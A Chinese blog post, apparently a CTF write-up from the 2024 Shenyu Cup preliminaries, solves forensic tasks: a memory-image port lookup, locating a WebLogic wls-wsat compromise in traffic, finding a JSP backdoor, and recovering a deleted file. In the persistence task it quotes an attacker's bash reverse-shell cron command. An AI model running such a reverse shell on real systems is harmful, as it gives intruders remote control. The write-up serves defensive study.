2024深育杯大学生网络安全大赛—网络安全攻防大赛[初赛] 部分Write up

已于 2024-11-26 14:41:26 修改
阅读量1.1k 收藏 20
点赞数 24
文章标签: web安全 安全 笔记
于 2024-11-25 19:17:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yo10_/article/details/144035311
版权

Yo10-深育杯 部分write up

Misc

【任务二】内网攻击
题目介绍:

问题2:攻击者远程服务器监听所用的端口是()?请提交flag,例如端口号为80,则提交Sangfor{80}

解题步骤:

题目附件给了一个raw文件

就可以得知这题是内存取证题

我们目前常用的取证:volatility、Lovelymem

volatility:https://volatilityfoundation.org/
Lovelymem:https://github.com/Tokeii0/LovelyMem

volatility解:

先查看系统镜像

python2 vol.py -f baka.raw imageinfo
在这里插入图片描述
题目让我们找端口,可以联想到去看网络连接状态

python2 vol.py -f baka.raw --profile=Win7SP1x64 netscan
在这里插入图片描述
flag:Sangfor{11451}

Lovelymem解:

用工具加载镜像

在进行网络扫描
在这里插入图片描述

等同 volatility 的 netscan
在这里插入图片描述
flag:Sangfor{11451}

Reverse

【任务一】miner
题目介绍:

小刘是一家单位信息科的技术工程师,这天他看到设备上有台机器,存在挖矿外连的告警,但是小刘发现,主机是一台服务器,他就想着这个服务器为什么会平白无故的进行挖矿,他自己先终止了挖矿进程,但是过不久后,告警再次复发,请你帮助他进行这次的安全排查工作。

问题1:小刘发现服务器存在外连的主要原因,是因为web漏洞导致,你能帮他定位到漏洞失陷点的接口嘛?失陷的时间点是什么时候?请提交"漏洞接口+失陷时间"的md5值,例如,漏洞接口为/upload/1.php,北京时间为2001-01-01 01:01,则计算md5(/upload/1.php+2001-01-01 01:01),flag{2f15b6eb1c3f63b98dc63d38ef0ff985}。

解题步骤:

题目附件给了一个流量包,还有一个服务器

翻看流量包会发现攻击者一直做的操作都是404
在这里插入图片描述

翻到流量包的最后 可以发现状态200的流量包

在这里插入图片描述

过滤/wls-wsat/CoordinatorPortType11

在这里插入图片描述

追踪到第一个流量里面去看看

在这里插入图片描述

可以看到执行的 whoami 命令 并成功回显了

那么这第一个流量包就是失陷的时间

在流量包中 他的时间是 2024年11月14日 05:12分

流量包中是utc时间 但是题目要求的是北京时间

往时间上面 +8 小时 或者 流量包中 Frame里面看中国标准时间

在这里插入图片描述

接口:/wls-wsat/CoordinatorPortType11

时间:2024-11-14 13:12

/wls-wsat/CoordinatorPortType11+2024-11-14 13:12

flag:flag{a507340db662534ba1be008751ab875f}

Pwn

【任务一】木马排查
题目介绍:

小王是一家it公司的运维管理员,这运维抓包期间,发现自己部署的监控程序显示,服务器执行异常命令,但这不是小王的操作,但是小王不知道该如何排查这个异常命令是怎么执行的。现在需要各位网络安全专家协助小王,根据攻击流量包以及登机排查本次执行异常命令时间。

问题1:攻击者的ip是多少?落地的文件名是什么?第一次连接恶意文件的北京时间是多少?flag{md5(ip+文件名+???-??-?? ??:??)},实例,flag{md5(127.0.0.1+a.exe+2001-10-10 10:10)}

解题步骤:

题目也是给了一个流量包和一个服务器

和前面那道题一样 前面的流量都是404

但是在后面可以发现很多 userLogin.jsp 是200的

在这里插入图片描述

连上服务器在/usr/local/tomcat/webapps/目录下发现 login.war

login.war里面的文件就是 userLogin.jsp

下载解压后发现被火绒杀掉了

在这里插入图片描述

或者服务器 翻看 userLogin.jsp 也能发现是后门文件

流量包中过滤 userLogin.jsp

在这里插入图片描述

前面两个是上传的流量

那么上传后第一个就是连接的时间

ip:192.168.233.1

落地文件:userLogin.jsp

时间:2024-11-13 23:53

192.168.233.1+userLogin.jsp+2024-11-13 23:53

flag:flag{4de6c855b6cf3593e762b992e7de1fe8}

【任务二】木马排查
题目介绍:

攻击者避免恶意文件被删除,丢失权限,创建了个后门,定期外连,执行外连的指令是?请提交flag,flag{md5(外连指令)}。

解题步骤:

定期外连,联想到定时任务

crontab -l

在这里插入图片描述

bash -i >& /dev/tcp/192.168.233.133/8888 0>&1

flag:flag{7d5a0e505b4fd47553a29872cd140dc2}

【任务四】木马排查
题目介绍:

管理员发现root目录下的一个文件被删除了,请你帮他恢复该文件,并获取到文件内容flag{文件内容}

解题步骤:

查看历史命令 history​ 可以发现 /root/flag.txt
在这里插入图片描述

但是在服务器中并没有发现flag.txt这个文件

在 startup.sh 文件中 发现它把 flag.txt 删除了

在这里插入图片描述

linux恢复删除的文件可以用 lsof

https://blog.csdn.net/m0_60721823/article/details/139943385?fromshare=blogdetail&sharetype=blogdetail&sharerId=139943385&sharerefer=PC&sharesource=cqy947639882&sharefrom=from_link

但是服务器上没有装

apt-get install lsof ​安装lsof

lsof | grep flag.txt​ 查看 flag.txt 进程

然后进入对应进程的目录 恢复flag.txt

在这里插入图片描述

这里进程是1 所以进入 /proc/1/fd

ll ​3是指向flag.txt

所以 cp 3 恢复的路径

最后查看flag.txt
在这里插入图片描述

flag:flag{congratulation}

END

Yo10 Team
关注
2024年9月网络安全行业活动、赛事一览
2302_76672693的博客
09-10 1399
2024年9月网络安全行业活动、赛事一览
CTF —网络安全大赛
weixin_68789096的博客
02-27 6366
💻随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。💂互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。👨‍👨‍👧‍👦网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛。
CTF misc图片类总结(brige、西湖论剑YUSA的小秘密、湖湘leaker、wear_a_mask)
诚邀网络通信领域商务合作
11-24 7288
文章目录一、zlib_rar+exif+分析像素_zip二、YCrCb通道隐写2021“西湖论剑“网络安全大赛YUSA的小秘密2020ByteCTF Hardcore Watermark 01 一、zlib_rar+exif+分析像素_zip 第一届misc,brige.png 使用binwalk分析出有zlib数据,但是无法使用binwalk -e或foremost分离出有效文件,在010editor中查看图片。 (1)运行命令 pngcheck.exe -v xx.png,可以详细查看每个数..
网络安全攻防赛题目
06-02
网络攻防 题目
网络安全的相关比赛有哪些?需要掌握哪些必备技能?
bigbangbangbang1的博客
05-29 1万+
CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事有DEFCON1、HITCON、0CTF等,代表性线上赛事有XCTF、ISCC、ASIS CTF等。
网络安全大赛_defcon2024
韩束一叶子
11-10 2268
赛事结束后进行颁奖,并对参赛者的表现进行总结和评价。
CTF网络安全攻防介绍
12-19
主要介绍网络安全攻防安全知识,以及需要的编码和所需要的
2020年CTF攻防大赛工具与WriteUp合集
【护航2020】第二届银联攻防大赛初赛WriteUp.docx: 这个文件可能包含了一场特定CTF赛事的Write-Up(解决方案汇总)。Write-Up通常详细描述了参赛队伍在解题过程中所采用的方法、使用的工具以及解题思路。它们对于...
网络安全攻防题库(附选择题)分析.docx
09-30
网络安全攻防题库(附选择题)分析.docx
网络安全知识题库
12-12
网络安全题库,选择题部分,已经校验过,全部正确,可以使用
网络安全特训之——网络信息安全攻防学习平台(选择题)
LizePing_的博客
06-11 3039
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录系列文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例
网络安全攻防实战标准试题
06-28
网络安全攻防实战标准试题,每套题判断题30道,单选题60道,多选题30道,共两套题。
ctf网络安全攻防练习题
12-04
ctf网络安全攻防练习题 从N=NP能得到的结论当然是N=1或者P=0,然后结合图片内容,猜测此题跟二进制01有关,信息应该藏在像素中等等
CTF题目合集
cgygsw的博客
01-26 4719
在给定的代码中,call_user_func_array(array($this, $this->method), $this->args) 的作用是调用对象 $this 的方法 $this->method(也就是调用ping函数的方法 也就是destruct下面那个ping函数),并将 $this->args 数组作为参数传递给该方法。反序列化之后就会调用wakeup这个函数 : 这个函数的内容 是对参数的内容进行了循环遍历 执行WAF函数的内容。
CTF wed安全攻防世界)练习题_ctfweb题目
Innocence_0的博客
05-24 941
进入网站如图:翻译:在这个小小的挑战训练中,你将学习Robots exclusionstandard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构,而不是保护内容不被抓取。好好享受吧!**步骤一:**进入robots.txt文件,如图:**步骤二:**得到/f10g.php,在进入这里面得到flag提交即可成功!!!
网络安全题库
热门推荐
人人为我,我为人人
08-09 1万+
安全的运行环境是软件安全的基础,操作系统安全配置是确保运行环境安全必不可少的工作,某管理员对即将上线的Windows操作系统进行了以下四项安全部署工作,其中哪项设置不利于提高运行环境安全?(5分) 操作系统安装完成后安装最新的安全补丁,确保操作系统不存在可被利用的安全漏洞 为了方便进行数据备份,安装Windows操作系统时只使用一个分区C,所有数据和操作系统都存放在C盘 操作系统上部署防病...
网络攻防技术(2021期末考试)
weixin_45160660的博客
06-23 5461
一、名词解释(20分) 1、什么是主动攻击?主动攻击包括哪些?什么是被动攻击?被动攻击包括哪些? 2、什么是漏洞?漏洞有哪些特性? 3、什么是Cookie?Cookie有哪些应用?画图说明跨站脚本攻击的攻击原理? 二、判断题(30分) (正确(T) 错误(F) 每小题3分) 1、计算机安全就是网络安全。 2、实施拒绝服务攻击的前提是系统存在某种安全漏洞。 3、SYN攻击是一种典型的欺骗攻击。 4、计算机病毒必须通过感染宿主才能实现自身传播。 5、端口扫描和网络嗅探都属于非法网络攻击。 6、导致缓冲区溢出的根
网络安全习题(《网络攻防原理与技术》)
rankling315的专栏
08-06 4417
第2章密码学基础知识 一、选择题 1、数据加密标准DES采用的密码类型是?(B) A、 序列密码 B、 分组密码 C、 散列码 D、 随机码 2、以下几种密码算法,属于公开密钥密码算法的是(C) A、DES B、3DES C、RSA D、AES 注: 公钥加密算法有RSA、DSA、ElGamal、ECC。 对称加密算法有DES、3DES、IDEA、AES、Blowfish、Twofish和RSA公司的RC系列算法(如RC2、RC4、RC5、RC6)等等 3、密码分析者只知道一些消息的密文,试图恢.
WEB安全--Java安全--CC1利用链
最新发布
m0_74800552的博客
05-14 1451
CC1利用链的原理与构建方式
lovelymem ver0.91
01-25
关于"LovelyMem Version 0.91"的信息,在网络上的资源可能较为有限或者特定,这取决于该软件的知名度以及是否由知名开发商发行。LovelyMem似乎不是广泛知名的软件名称,因此直接找到版本0.91的具体信息、下载链接或是官方发布的更新日志可能会比较困难。 对于查找这类较具体的小众软件信息的方法如下: 查询官方网站或开发者页面 如果 LovelyMem 是一款公开发布的应用程序,则其官方网站会是最可靠的获取最新版本及变更记录的地方。访问官网可以确保获得最准确的第一手资料。 利用专业技术论坛与社区讨论区 像 Reddit, Stack Overflow 这样的平台经常会有用户分享有关各种应用的经验和见解。尝试在这些地方搜索是否有提及 LovelyMem 及其版本历史。 检查第三方软件分发站点 一些网站专门用于托管不同类型的免费和付费软件供人下载试用。例如 SourceForge, GitHub 等开源项目托管平台上也许能找到目标程序及其版本迭代详情。 查阅科技博客和技术新闻报道 有时候新版本的应用会被某些专注于介绍新兴事物的技术类媒体所覆盖。浏览此类文章或许能间接了解到所需资讯。 鉴于以上建议,针对 LovelyMem 版本 0.91 更精确的数据需要进一步探索上述渠道来收集。同时请注意确认来源的安全性和合法性以保障个人电脑系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值